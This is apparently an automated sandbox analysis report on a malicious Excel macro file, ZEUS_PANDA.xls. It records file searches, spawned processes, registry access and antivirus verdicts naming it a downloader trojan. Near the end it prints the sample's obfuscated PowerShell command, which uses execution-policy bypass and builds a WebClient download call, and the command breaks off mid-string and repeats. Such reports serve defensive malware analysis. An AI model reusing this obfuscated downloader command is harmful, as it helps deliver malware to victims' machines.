miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe
miscellaneous
File
00:24:093 Operations, Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe
miscellaneous
00:24:110 Files Read C:\Windows\System32\WindowsPowerShell\v1.0\
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:110 Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.MSC
Operations,
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:110 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.psd1
miscellaneous
00:24:110 File Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.psm1
Operations,
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.VBS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.CMD
miscellaneous
00:24:125 File Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.BAT
Operations,
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.WSH
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.ps1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.psd1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.psm1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.BAT
miscellaneous
00:24:125 File Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.VBS
Operations,
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.BAT
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.CMD
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.COM
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.EXE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.JS
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.JSE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.MSC
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.VBE
miscellaneous
File
00:24:125 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.WSF
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.ps1
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.WSH
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.psd1
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.psm1
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.WSF
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.VBS
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.VBE
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.MSC
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.JSE
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.JS
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.EXE
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.COM
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.CMD
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.BAT
miscellaneous
File
00:24:141 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.WSH
miscellaneous
{871C5380-42A0-1069-A2EA-08002B30309D}
Process
00:24:187
Created
Executed a shell command 2yv4ezjzrwg.exe

Process
00:24:202
Opened
Executed a shell command soqckmm9cu.exe

Process
00:24:218
Opened
Registry
00:24:218 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\607f993e\7d1d7403
Opened
Registry
00:24:218 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management.resources_en-US_31bf3856ad364e35
Opened
Files
00:24:343 C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2308.4030015
Deleted
Files
00:24:343 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2308.4030015
Deleted
Files
00:24:343 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2308.4030015
Deleted
Process
00:24:360 Operations, Disabled the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications for the dynamic-link library
miscellaneous
Files
00:24:360 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.1160.4030250
Deleted
Files
00:24:360 C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.1160.4030250
Deleted
Files
00:24:360 C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1160.4030250
Deleted
Process
00:24:360 Ended itself and all of its threads
killed
Process
00:24:406 Operations, Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
miscellaneous
Process
00:24:406 Ended itself and all of its threads
killed
Engine Analysis
Engine Threat Name Severity
GTI File Reputation TYPE_TROJAN ⬤ 5 - Very High
GTI URL Reputation Malicious Sites ⬤ 5 - Very High
Gateway Anti-Malware X97M/Downloader.fe ⬤ 5 - Very High
Anti-Malware X97M/Downloader.fe ⬤ 5 - Very High
YARA
Custom Rules
Sandbox Malware.Dynamic ⬤ 5 - Very High
Final ⬤ 5 - Very High
Sample is malicious: final severity level 5
Embedded/Dropped content
MD5 Name Category
964F772B7D99D4989AFFB5CAD27DCBD6 3968952d-fd5a-4618-bce9-f8b63aaeddc7.vba * ---
* Attachment was extracted from the sample file and stored in the dropfiles.zip
Screenshots
Note: a pop-up window was detected during dynamic analysis so user interaction may be required in order to fully analyze this sample
Images: 8
26586.jpg
25db6.jpg
1a1f8.jpg
286e9.jpg
76d5.jpg
29acf.jpg
2b80b.jpg
2b358.jpg
ZEUS_PANDA.xls
Run-Time Dlls: 9
api-ms-win-appmodel-runtime-l1-1-0.dll
mso.dll
vbe6intl.dll
vbe6.dll
comctl32.dll
oleaut32.dll
scp32.dll
shlwapi.dll
version.dll
File Operations: 22
Files Opened
File Name Access Mode File Attributes
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config Read Normal
C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll 20000 10000000
C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll 20000 10000000
Files Deleted
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\3968952d-fd5a-4618-bce9-f8b63aaeddc7.LNK
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\gvrlzxvbbk.LNK
Files Read
C:\Windows\Microsoft.NET\Framework\
C:\Windows\Microsoft.NET\Framework\v2.0.50727
C:\gvrlzxvbbk\3968952d-fd5a-4618-bce9-f8b63aaeddc7.xls
Other
Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
Obtained a set of FAT file system attributes for a file or directory
Obtained the current directory for the current process
Obtained the path of the Windows system directory
Retrieved the full path for the module
Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*
Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*

Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
Searched a directory for the name: C:\gvrlzxvbbk\3968952d-fd5a-4618-bce9-f8b63aaeddc7.xls
Registry Operations: 41
Registry Created
HKCU\Software\Microsoft\VBA\6.0\Common
Registry Opened
HKCR\Licenses
HKCR\TypeLib
HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}
HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKCR\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\0
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\0\win32
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\409
HKCR\TypeLib\{00020813-0000-0000-C000-000000000046}\1.6\9
HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}
HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4
HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4\0
HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.4\0\win32
HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf
HKCU\Software\Microsoft\.NETFramework
HKCU\Software\Microsoft\Office\12.0\Excel
HKLM\SOFTWARE\Microsoft\Fusion
HKLM\SOFTWARE\Microsoft\VBA\Monitors
HKLM\Software\Microsoft\.NETFramework
HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades
HKLM\Software\Microsoft\VBA
HKLM\Software\Microsoft\Windows\CurrentVersion
Registry Read
Enumerated registry keys
HKCU\Software\Microsoft\Office\12.0\Excel DisableThreadAffinity
HKCU\Software\Microsoft\VBA\6.0\Common BackGroundCompile
HKCU\Software\Microsoft\VBA\6.0\Common BreakOnAllErrors
HKCU\Software\Microsoft\VBA\6.0\Common BreakOnServerErrors
HKCU\Software\Microsoft\VBA\6.0\Common CompileOnDemand
HKCU\Software\Microsoft\VBA\6.0\Common NotifyUserBeforeStateLoss
HKCU\Software\Microsoft\VBA\6.0\Common RequireDeclaration
HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks
HKLM\Software\Microsoft\.NETFramework InstallRoot
HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR
HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue
HKLM\Software\Microsoft\VBA Vbe6DllPath
HKLM\Software\Microsoft\Windows\CurrentVersion CommonFilesDir
Other
Enumerated the values for an open registry key

Process Operations: 22
cmd.exe /c "pôwêrs^hel^l^.e^xê^ -no^l -no^ni^nt^ -wîndo^ws^ 1 -nopro^file^ -exêcû b^ypa^s^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='2yv4ezcmd.exe /c "pôwêrs^hel^l^.e^xê^ -no^l -no^ni^nt^ -wîndo^ws^ 1 -nopro^file^ -exêcû b^ypa^s^s
